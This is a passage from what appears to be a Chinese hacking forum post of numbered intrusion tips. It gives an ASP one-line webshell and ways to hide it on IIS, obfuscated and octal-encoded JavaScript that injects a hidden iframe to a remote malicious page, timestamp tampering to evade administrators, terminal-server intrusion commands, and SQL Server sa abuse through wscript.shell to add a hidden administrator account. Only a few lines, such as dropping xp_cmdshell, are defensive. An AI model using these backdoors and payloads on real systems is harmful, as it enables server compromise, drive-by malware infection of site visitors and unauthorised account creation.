* k% g$ o$ `3 C8 J8 ]/ ?) E执行后可以用AT命令查看新加的任务
6 A! V8 s1 K) X. }用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。+ Z; ]0 D/ k1 F# T% y% c$ @" `8 F
% C2 }- k5 B# v' f
53、隐藏ASP后门的两种方法
$ c" U1 y" Z3 @- J* a* [% j1、建立非标准目录:mkdir images..\& B# ?+ \4 M6 h& j6 G! t1 R
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp# Z0 ^7 O- c4 O
通过web访问ASP木马:http://ip/images../news.asp?action=login3 C/ k- @" J1 X* o) f" q; T2 Q
如何删除非标准目录:rmdir images..\ /s
3 X7 v( O e% t2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
# |( t* {5 c9 P( W3 ?mkdir programme.asp. C1 C# J' S- e: c/ u5 b
新建1.txt文件内容:<!--#include file=”12.jpg”-->
' E4 m/ z9 G4 b3 h6 m# h新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件! o5 E3 W) x" q* ~/ h$ G! p# I- q
attrib +H +S programme.asp
8 l/ E8 b; C# s9 e1 C% X通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
, P: c+ J& V g6 k" [1 d9 m- W
) L! R5 e) {( E& T1 |. ~1 L" A8 E54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。& C% x6 I, Y1 ?
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
* t V0 e+ k( p6 K
' j4 l/ N& V$ ]- {55、JS隐蔽挂马
# h2 Y0 W' g [" U4 G3 h* B1.* A1 S( J1 E2 g! J
var tr4c3="<iframe src=ht";" ?/ M0 Z- Y Z: E
tr4c3 = tr4c3+"tp:/";
3 }' j5 Q. t. _, O$ `" m" d9 o/ ]% Str4c3 = tr4c3+"/ww";5 d, e& s- Q5 C$ k) L! a) i3 i0 Y" ?
tr4c3 = tr4c3+"w.tr4";- W6 G- w S$ i( L
tr4c3 = tr4c3+"c3.com/inc/m";9 U- o) q' K& K8 S9 h
tr4c3 = tr4c3+"m.htm style="display:none"></i";1 p b k4 ^. T4 [$ w+ Y9 M3 d
tr4c3 =tr4c3+"frame>'"; g& n( L" r" {- w3 o8 m# [- I
document.write(tr4c3);7 y( M3 K$ p$ P& @5 s
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
+ P' p" T% o, Y' r) R- R2 \- K/ Q0 v3 H5 v! D
2.1 E* W/ X/ V9 ?8 }3 B
转换进制,然后用EVAL执行。如: G) [2 v- ^ [2 {' w, Q( [8 F
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");" M V* S: `) e* C s
不过这个有点显眼。
' ^# F( P6 d8 v% O- A4 I& E9 ~3.' l J, F7 s! E4 S5 \8 V8 S3 H9 i
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
r6 Z& ^) v! U) `1 L8 T$ \! f4 {4 @最后一点,别忘了把文件的时间也修改下。8 M/ L/ v/ ?4 U' o6 g
( b) q* t% t; n7 s" }: y0 j56.3389终端入侵常用DOS命令
) z6 o- l+ S: r1 [" C( Ftaskkill taskkill /PID 1248 /t
2 P6 j6 e" F" F v6 t7 d- L2 ^2 f$ T7 o. j! c
tasklist 查进程
* ~ b3 c5 D3 M9 j" G$ A4 i5 Y8 u1 H, i3 j# a3 ?
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
! l# q7 C6 o. ^+ Miisreset /reboot- X' T, M3 |/ B9 p! e1 p V
tsshutdn /reboot /delay:1 重起服务器
+ j& ]& z9 v* W/ N, e9 L4 N r! C! M% s( }
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
$ v& s ]9 J2 w6 i- K4 L4 W3 [" P9 Q; l) n( `' d: }& K' [/ u- W- K
query user 查看当前终端用户在线情况
4 X2 B s# u# H! ^9 U/ f6 S+ N$ E0 a+ r7 a" n' `: a/ D5 \
要显示有关所有会话使用的进程的信息,请键入:query process *
0 p1 X* m5 c% J/ C
P! `: T$ F( U- g. D4 Q3 S+ a要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:23 C* s2 e7 q" O" ~
: ] z; H$ u) a: |/ E5 g# R3 i要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2* S' b! u1 P% P2 A
# n+ v# I7 v, W( H* }/ u% @3 I要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
2 R, w g& J$ | m+ \0 |! v- H
0 x9 F4 @& ^; \6 s. w5 |命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
2 Q1 }" y+ F, v; Q# t6 k( K7 H- z% q5 D9 p% }
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
: W0 S2 C1 B+ G* z, B0 r* \" Q/ g1 [) x" y3 v' T4 R0 p/ u
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
% c6 v8 ~4 [9 F* b6 X7 p: s% K% y, h$ X/ ?- U$ m
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
$ ` T% `5 o* s' H; A* o6 W
) x* @, a* f9 @5 X C56、在地址栏或按Ctrl+O,输入:
- U% W! a! p& g( Zjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
; x. E. u$ K# @) ]
# u) H% }% U7 r! m源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
, C c6 e6 w0 g# s% f* D; e. I$ i2 F8 O
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,+ I: C% F% G7 f# }# K3 P. H: N
用net localgroup administrators是可以看到管理组下,加了$的用户的。" m' H3 A% S4 k4 U
1 q6 I2 R3 D8 U6 w
58、 sa弱口令相关命令/ z- X. n0 P% m, L# l0 e( ~" V
8 p5 j: l- C* f
一.更改sa口令方法:
4 H: L+ M T5 ?* I用sql综合利用工具连接后,执行命令:: j; B3 i, {) {+ A
exec sp_password NULL,'20001001','sa'
4 X- i- O8 N; R* [* T0 o(提示:慎用!)
7 T+ F: p# U+ o/ u3 L& ?) F4 J3 T3 m. {7 _0 b P: W. n# B
二.简单修补sa弱口令.$ k' {) N4 F$ K' Z+ h3 j4 Q$ y$ ]
n3 A: C: }: O. y, ]# F
方法1:查询分离器连接后执行:
. p6 R: H0 v+ q( _if exists (select * from: a% `9 |" V: S& U- K, `
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
8 q1 T& {2 W. E) z! I7 \OBJECTPROPERTY(id, N'IsExtendedProc') = 1)8 M! Q0 F; b3 i, T' Z3 s* K
8 {! W9 |$ g' {% h0 J, r
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'9 J4 b8 e, y( ^/ y. J- w
) _( m7 ]4 y- i' C( w2 {GO
& {& x9 \( R6 d/ p y" p0 ^4 J9 m9 n! ~; g$ g5 T
然后按F5键命令执行完毕1 L3 r; [$ Z( A# Q0 X% X1 _9 j
5 a2 G( \, `6 a/ d: k方法2:查询分离器连接后' D* m- a2 ~: k8 H
第一步执行:use master( R% d0 Q! Y; x* e$ [" g& j$ m
第二步执行:sp_dropextendedproc 'xp_cmdshell'' M3 V: n* V$ i
然后按F5键命令执行完毕4 J) w4 y+ \. {8 W
9 }. H+ l! v7 d8 ]& [
8 R/ \8 Q% D1 k. \/ B8 \三.常见情况恢复执行xp_cmdshell.; t/ T2 I& o$ x
6 Y& y- Z$ Q, Y7 n
% L( `, T/ _- u0 n6 b* ^. v6 [1 未能找到存储过程'master..xpcmdshell'.. U6 k. t' f9 H7 ?
恢复方法:查询分离器连接后,' s- w! X0 V; W8 r! g/ R% {
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
* k4 A" m; i: R% x第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
" n& M) T1 U `1 v6 z然后按F5键命令执行完毕
/ r# ~! Y; N% B- j4 `9 a& c3 x: T+ P- o4 r9 @6 |4 \% W
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)7 U. Z% ~! I; S! u0 S
恢复方法:查询分离器连接后,
, C* y3 I) T+ m; } s; ]2 M第一步执行:sp_dropextendedproc "xp_cmdshell"- x% I+ A. Z/ M4 U0 ^. s
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
% W4 K/ D& }# ]1 \0 b' z. u: M然后按F5键命令执行完毕
5 l1 Q5 Z! Z" u) k# M
0 \& ^ p. L' }- E' ]# u1 o3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
" l9 v3 `; H5 Q+ P- Q P; o恢复方法:查询分离器连接后,, t4 H' `- T) p, g
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
7 l+ c! {0 `! n# N( f第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 1 `) q! E ^+ ^- h* s' ^
然后按F5键命令执行完毕. A7 X2 `& Z" [; {' _
# r& W* V* ~+ P( X4 ~5 s四.终极方法.. D( G) Z4 Y" @( r5 _
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
4 b, c: }; l2 q( c( V( a查询分离器连接后,3 D, E* _) {/ L) f; s
2000servser系统:
1 Y" u$ |5 j. C8 F: ?. ~' B; `: V9 Edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'( Y# E: h" h m. u5 D/ r. a
" N. G; l R8 o# E
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. F2 `) P; [# D# L- L- d, T- q' V- a6 A, T! ^+ [/ y" Z
xp或2003server系统:
' u7 ?# n7 D' e, q B3 K% i! ` K) G; L3 ^2 [5 Y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
: n/ h) H7 o1 E6 J ^! h- c4 H( m
- o' W2 n! H& \# b( Xdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
l1 c: j$ ^& H9 B" K6 o0 @# X |
发表于 2012-9-15 14:13:15
收藏
分享
支持
反对